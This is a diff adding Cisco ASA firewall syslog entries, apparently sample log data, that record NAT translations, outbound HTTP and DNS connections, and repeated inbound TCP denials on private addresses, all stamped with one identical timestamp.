+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11783 for outside:192.168.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1457 to outside:192.168.98.44/8270 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11784 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1457 (172.31.98.44/1457) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1458 to outside:192.168.98.44/8271 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11785 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1458 (172.31.98.44/1458) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11786 for outside:192.168.1.107/53 (192.168.1.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11784 for outside:192.168.198.40/80 to inside:172.31.98.44/1457 duration 0:00:00 bytes 593 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1459 to outside:192.168.98.44/8272 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11787 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1459 (172.31.98.44/1459) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11786 for outside:192.168.1.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 375 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1460 to outside:192.168.98.44/8273 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built 
outbound TCP connection 11788 for outside:192.168.192.44/80 (192.168.192.44/80) to inside:172.31.98.44/1460 (172.31.98.44/1460) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1454 to outside:192.168.98.44/8267 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1385 to outside:192.168.98.44/8277 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11797 for outside:192.168.19.254/80 (192.168.19.254/80) to inside:172.31.156.80/1385 (172.31.156.80/1385) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1455 to outside:192.168.98.44/8268 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1456 to outside:192.168.98.44/8269 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1457 to outside:192.168.98.44/8270 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1458 to outside:192.168.98.44/8271 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1459 to outside:192.168.98.44/8272 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1460 to outside:192.168.98.44/8273 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11564 for outside:192.168.115.46/80 to inside:172.31.156.80/1382 duration 0:05:25 bytes 575 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11797 for outside:192.168.19.254/80 to 
inside:172.31.156.80/1385 duration 0:00:00 bytes 5391 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1386 to outside:192.168.98.44/8278 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11798 for outside:192.168.115.46/80 (192.168.115.46/80) to inside:172.31.156.80/1386 (172.31.156.80/1386) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src 
outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1275 to outside:192.168.98.44/8279 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11799 for outside:192.168.205.99/80 (192.168.205.99/80) to inside:172.31.98.44/1275 (172.31.98.44/1275) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1190 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11800 for outside:192.168.14.30/53 (192.168.14.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11800 for outside:192.168.14.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 373 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11801 for outside:192.168.252.210/53 (192.168.252.210/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11801 for outside:192.168.252.210/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 207 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1276 to outside:192.168.98.44/8280 
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11802 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1276 (172.31.98.44/1276) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1277 to outside:192.168.98.44/8281 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11803 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1277 (172.31.98.44/1277) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11802 for outside:192.168.98.165/80 to inside:172.31.98.44/1276 duration 0:00:00 bytes 12853 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1278 to outside:192.168.98.44/8282 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11804 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1278 (172.31.98.44/1278) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11803 for outside:192.168.98.165/80 to inside:172.31.98.44/1277 duration 0:00:00 bytes 5291 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1279 to outside:192.168.98.44/8283 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11805 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1279 (172.31.98.44/1279) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11804 for outside:192.168.98.165/80 to inside:172.31.98.44/1278 duration 0:00:00 bytes 965 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11805 for outside:192.168.98.165/80 to inside:172.31.98.44/1279 duration 0:00:00 bytes 8605 TCP FINs +Oct 10 
2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1280 to outside:192.168.98.44/8284 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11806 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1280 (172.31.98.44/1280) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11806 for outside:192.168.98.165/80 to inside:172.31.98.44/1280 duration 0:00:00 bytes 3428 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1281 to outside:192.168.98.44/8285 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11807 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1281 (172.31.98.44/1281) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1282 to outside:192.168.98.44/8286 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11808 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1282 (172.31.98.44/1282) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1283 to outside:192.168.98.44/8287 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11809 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1283 (172.31.98.44/1283) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1284 to outside:192.168.98.44/8288 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11810 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1284 (172.31.98.44/1284) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP 
connection 11807 for outside:192.168.98.165/80 to inside:172.31.98.44/1281 duration 0:00:00 bytes 2028 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11808 for outside:192.168.98.165/80 to inside:172.31.98.44/1282 duration 0:00:00 bytes 1085 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11809 for outside:192.168.98.165/80 to inside:172.31.98.44/1283 duration 0:00:00 bytes 868 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1285 to outside:192.168.98.44/8289 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11811 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1285 (172.31.98.44/1285) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1286 to outside:192.168.98.44/8290 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11812 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1286 (172.31.98.44/1286) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11810 for outside:192.168.98.165/80 to inside:172.31.98.44/1284 duration 0:00:00 bytes 4439 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1287 to outside:192.168.98.44/8291 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11813 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1287 (172.31.98.44/1287) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11811 for outside:192.168.98.165/80 to inside:172.31.98.44/1285 duration 0:00:00 bytes 914 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11812 for 
outside:192.168.98.165/80 to inside:172.31.98.44/1286 duration 0:00:00 bytes 871 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11814 for outside:192.168.100.107/53 (192.168.100.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1288 to outside:192.168.98.44/8292 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11815 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1288 (172.31.98.44/1288) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11814 for outside:192.168.100.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 384 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11816 for outside:192.168.104.8/53 (192.168.104.8/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11816 for outside:192.168.104.8/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 94 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1289 to outside:192.168.98.44/8293 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11817 for outside:192.168.123.191/80 (192.168.123.191/80) to inside:172.31.98.44/1289 (172.31.98.44/1289) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11815 for outside:192.168.98.165/80 to inside:172.31.98.44/1288 duration 0:00:00 bytes 945 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11813 for outside:192.168.98.165/80 to inside:172.31.98.44/1287 duration 0:00:00 bytes 13284 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP 
connection 11818 for outside:192.168.100.4/53 (192.168.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11818 for outside:192.168.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1290 to outside:192.168.98.44/8294 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11819 for outside:192.168.198.25/80 (192.168.198.25/80) to inside:172.31.98.44/1290 (172.31.98.44/1290) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 9828 for outside:192.168.48.1/67 to NP Identity Ifc:255.255.255.255/68 duration 0:58:46 bytes 58512 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1272 to outside:192.168.98.44/8276 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11820 for outside:192.168.3.39/53 (192.168.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11821 for outside:192.168.162.30/53 (192.168.162.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11820 for outside:192.168.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 168 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11822 for outside:192.168.3.39/53 (192.168.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11821 for outside:192.168.162.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 198 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: 
Teardown UDP connection 11822 for outside:192.168.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11823 for outside:192.168.48.186/53 (192.168.48.186/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11823 for outside:192.168.48.186/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 84 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1291 to outside:192.168.98.44/8295 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11824 for outside:192.168.54.190/80 (192.168.54.190/80) to inside:172.31.98.44/1291 (172.31.98.44/1291) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11825 for outside:192.168.254.94/53 (192.168.254.94/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11825 for outside:192.168.254.94/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 188 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1292 to outside:192.168.98.44/8296 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11826 for outside:192.168.54.190/80 (192.168.54.190/80) to inside:172.31.98.44/1292 (172.31.98.44/1292) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1293 to outside:192.168.98.44/8297 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11827 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1293 (172.31.98.44/1293) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP 
translation from inside:172.31.98.44/1294 to outside:192.168.98.44/8298
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11828 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1294 (172.31.98.44/1294)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11827 for outside:192.168.98.165/80 to inside:172.31.98.44/1293 duration 0:00:00 bytes 5964 TCP FINs
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1295 to outside:192.168.98.44/8299
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11829 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1295 (172.31.98.44/1295)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1296 to outside:192.168.98.44/8300
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11830 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1296 (172.31.98.44/1296)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11828 for outside:192.168.98.165/80 to inside:172.31.98.44/1294 duration 0:00:00 bytes 6694 TCP FINs
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11829 for outside:192.168.98.165/80 to inside:172.31.98.44/1295 duration 0:00:00 bytes 1493 TCP FINs
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11830 for outside:192.168.98.165/80 to inside:172.31.98.44/1296 duration 0:00:00 bytes 893 TCP FINs
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1297 to outside:192.168.98.44/8301
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11831 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1297 (172.31.98.44/1297)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1298 to outside:192.168.98.44/8302
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11832 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1298 (172.31.98.44/1298)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11833 for outside:192.168.179.9/53 (192.168.179.9/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11833 for outside:192.168.179.9/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11831 for outside:192.168.98.165/80 to inside:172.31.98.44/1297 duration 0:00:00 bytes 2750 TCP FINs
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1299 to outside:192.168.98.44/8303
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11834 for outside:192.168.247.99/80 (192.168.247.99/80) to inside:172.31.98.44/1299 (172.31.98.44/1299)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1300 to outside:192.168.98.44/8304
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11835 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1300 (172.31.98.44/1300)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11832 for outside:192.168.98.165/80 to inside:172.31.98.44/1298 duration 0:00:00 bytes 881 TCP FINs
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11835 for outside:192.168.98.165/80 to inside:172.31.98.44/1300 duration 0:00:00 bytes 2202 TCP FINs
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1301 to outside:192.168.98.44/8305
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11836 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1301 (172.31.98.44/1301)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1302 to outside:192.168.98.44/8306
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11837 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1302 (172.31.98.44/1302)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1276 to outside:192.168.98.44/8280 duration 0:00:30
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1277 to outside:192.168.98.44/8281 duration 0:00:30
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1278 to outside:192.168.98.44/8282 duration 0:00:30
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1279 to outside:192.168.98.44/8283 duration 0:00:30
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1280 to outside:192.168.98.44/8284 duration 0:00:30
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1281 to outside:192.168.98.44/8285 duration 0:00:30
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1282 to outside:192.168.98.44/8286 duration 0:00:30
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1283 to outside:192.168.98.44/8287 duration 0:00:30
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1284 to outside:192.168.98.44/8288 duration 0:00:30
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1285 to outside:192.168.98.44/8289 duration 0:00:30
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1286 to outside:192.168.98.44/8290 duration 0:00:30
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1287 to outside:192.168.98.44/8291 duration 0:00:30
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1288 to outside:192.168.98.44/8292 duration 0:00:30
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1293 to outside:192.168.98.44/8297 duration 0:00:30
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1294 to outside:192.168.98.44/8298 duration 0:00:30
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1304 to outside:192.168.98.44/8308
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11840 for outside:192.168.205.99/80 (192.168.205.99/80) to inside:172.31.98.44/1304 (172.31.98.44/1304)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1295 to outside:192.168.98.44/8299 duration 0:00:30
